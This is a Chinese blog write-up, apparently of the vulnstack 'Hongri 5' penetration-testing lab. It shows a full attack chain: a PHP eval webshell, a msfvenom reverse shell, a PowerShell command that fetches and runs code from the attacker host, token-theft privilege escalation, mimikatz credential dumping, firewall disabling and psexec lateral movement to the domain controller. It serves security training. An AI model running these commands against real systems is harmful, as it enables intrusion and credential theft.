红日靶场5

最新推荐文章于 2024-06-18 02:06:06 发布
最新推荐文章于 2024-06-18 02:06:06 发布
阅读量495 收藏 2
点赞数
文章标签: php 服务器 microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58595840/article/details/128628850
版权 
kali攻击机:192.168.43.54

web目标:192.168.43.2     192.168.22.134

DC控制器:192.168.22.133

该实验需要进入web服务器手动开启web服务,开启后对其进行渗透测试
 

虚拟机密码

win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

1、nmap扫描发现主机

nmap -A 192.168.43.54/24 

└─# nmap -A 192.168.43.54/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 20:48 EST
Nmap scan report for 192.168.43.2
Host is up (0.00056s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: SUN)
3306/tcp  open  mysql        MySQL (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC

开启80端口,访问目标。发现是thinkphp框架

使用工具getshell,存在命令执行漏洞,

写入后门一句话,

echo "<?php @eval($_POST[cmd]);?>" >shell.php

蚁剑进行连接成功

msf生成后门,蚁剑进行上传获取shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.54 lport=8080 -f exe -o 8080.exe

开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.54
set lport 8080
exploit
​

蚁剑进行执行

获取到shell,

进行权限提升,尝试令牌窃取失败,尝试使用烂土豆配合令牌窃取提权,上传烂土豆

回到msf,执行烂土豆

execute -cH -f ./potato.exe

再次尝试进行令牌窃取,成功获得sysytem权限

进行信息收集,发现存在域

收集网卡信息,发现存在第二张网卡,添加路由

方法一、cs

上线cobalstrike,生成payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.43.54:80/a'))"

在服务器执行,成功上线

 

查看其他域内主机信息:shell net view
判断是否存在多个域:shell net view /domain
查看域内用户:shell net user /domain
查看域控制器:net group “domain controllers” /domain
查看域管理员的名字:net group “domain admins” /domain

通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.22.134,win7双网卡:192.168.43.2、192.168.22.134。其中域控制器DC.sun.com,域管理员为Administrator。

扫描ip和DC端口开放情况

portscan 192.168.22.0/24 1-6000 arp 10
portscan 192.168.22.133 1-1024,3389,5900-6000 none 1024

抓取明文密码

获得明文密码,利用PsExec64进行横向移动,使用前需要关闭防火墙,445端口还得是开放的

关闭防火墙

shell NetSh Advfirewall set allprofiles state off

首先建立正向监听

 

选择目标中的DC,使用收集到的密码进行psexec横向移动

成功上线DC

方法二、msf

我们在上面已经通过烂土豆配合令牌窃取获得system权限了,添加22网段路由转发

run autoroute -s 192.168.22.0/24

使用wiki模块抓取密码

load kiwi
 kiwi_cmd privilege::debug
 kiwi_cmd sekurlsa::logonPasswords

报错了kiwi只能在x86进程下执行,那就使用进程迁移

重新抓取密码

利用Psexec模块登录域控

use exploit/windows/smb/psexec
set rhosts 192.168.22.133  //域控ip
set SMBDomain SUN
set SMBUser administrator  //域控用户
set SMBPass tfcTFC123 #密码
set payload windows/meterpreter/bind_tcp
set lport 6666
Run

有时可能还需要关闭 防火墙

利用shell建立连接,关闭防火墙
​
net use \192.168.22.133\ipc$ “Lwj.123456” /user:“administrator”
sc \192.168.22.133 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”
sc \192.168.22.133 start unablefirewall

即可上线

karry_test
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2023
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
红队靶场之VulnStack5红日安全,域横向,移动反弹sehll,thikphpV5.0的RCE漏洞
m0_58116751的博客
05-16 816
远程命令执行是使用此模块的攻击向量的一个很好的例子。再kali上添加socks的代理文件 编辑/etc/proxychains.conf文件,将socks5服务器指向127.0.0.1的1080端口,之后便可以使用proxychains将我们的程序代理进内网了。没关系,既然有了域管理员的密码,我们可以尝试关闭Windows 2008的防火墙。我们systeminfo查看他的一个系统信息,第一次查看无回显之后将蚁剑连接数据删除后再尝试就有回显了可能是一个蚁剑的小问题,多尝试就好了。
红日渗透靶场测试(1)
最新发布
2302_78903258的博客
06-18 1027
我是根据此位博客的内容进行操作的,大家如果看不懂我内容的话,可以看看这位博客,里面的环境配置很详细。
红日内网渗透靶场5(ATK&CK红队评估实战靶场五)
qq_45780190的博客
04-24 4637
环境搭建: 第一次登录会提示需要更改账号密码。 win7账号密码: sun\heart 123.com sun\Administrator dc123.com ————————————————————————————————————————————————————————————— 2008账号密码 sun\admin 2020.com 外网采用NAT模式,内网采用仅主机模式。 添加一个主机模式用于内网,设置网段为192.168.138.0. NAT用于外网,设置网段为192.168.235.0
红日靶场(五)
qq_58091216的博客
05-05 2441
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日靶场第五关
红队是青春
12-02 6308
红日靶场第五关 一、环境配置 靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com # win7 web需要打开C盘里的phpstudy,最好关一下防火墙 2008 sun\admin 2020.com Win7双网卡模拟内外网 VMnet2网卡:192.168.25.0/24 外网 VMn
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
2021-7-7红日团队靶场
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
红日Web安全新手入门专刊.pdf
08-08
目录 1 web 安全新手入门指南 2 安全靶场实例分析
红日串词.doc
09-16
5. **情感共鸣**:《那些年》、《平凡之路》等歌曲触动人心,揭示了艺术作品通过情感共鸣与观众建立联系的能力,这对于任何创作都是非常关键的。 6. **文化传承**:《东风破》和《琴师》等节目融入了传统文化元素,...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
红日靶场七教程,不看后悔!
weixin_45885440的博客
10-11 1582
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
ATT&CK实战系列——红队实战(五)
lza20001103的博客
10-17 2482
ATT&CK实战系列——红队实战(五) 文章目录ATT&CK实战系列——红队实战(五)前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记 前言 前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。 靶场搭建 靶场下载
红日靶场(一)
qq_58091216的博客
05-01 3084
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
红日靶场1搭建&渗透
m0_75178803的博客
02-03 2794
前面我们登录进去之后,可以看到还有一个yxcms的数据库,同时我们进入后台之后,可以看到一个 beifen.rar备份文件和yxcms目录,这道题其实还有一种getshell的方法,这里我们也记录一下。那么如果修改 general_log_file 的值为一个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell。,即可将一句话木马写入 hack.php 文件中 访问/hack.php 成功写入,也能访问页面,那就用蚁剑直接连一下看看。
红日靶场五渗透记录
m0_63028223的博客
12-26 473
一次简单的think PHP+内网环境渗透
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先需要在CSDN(中国软件与技术服务股份有限公司)网站上搜索相关资源。CSDN是中国最大的IT技术社区和资源分享平台,用户可以在其网站上找到各种技术文档、开发工具和学习资源。 在CSDN网站上搜索红日靶场,可以找到一些与红日靶场相关的下载链接。用户可以根据自己的需求选择合适的下载链接,点击下载按钮即可开始下载。 下载过程可能需要一些时间,具体时间取决于网络连接速度和文件大小。一旦下载完成,用户可以根据下载的文件类型进行相应的安装或配置,以确保红日靶场能够正常运行。 如果在CSDN上找不到合适的下载资源,也可以尝试在其他一些技术资源网站或论坛上搜索红日靶场下载链接。同时,用户还可以考虑通过与其他网络安全爱好者或专业人士交流,获得更多关于红日靶场下载的信息和建议。 最后,下载红日靶场后,用户可以通过参与其中的各种实验和挑战,提升自己的网络安全技能,并加深对各种攻防技术的理解和应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值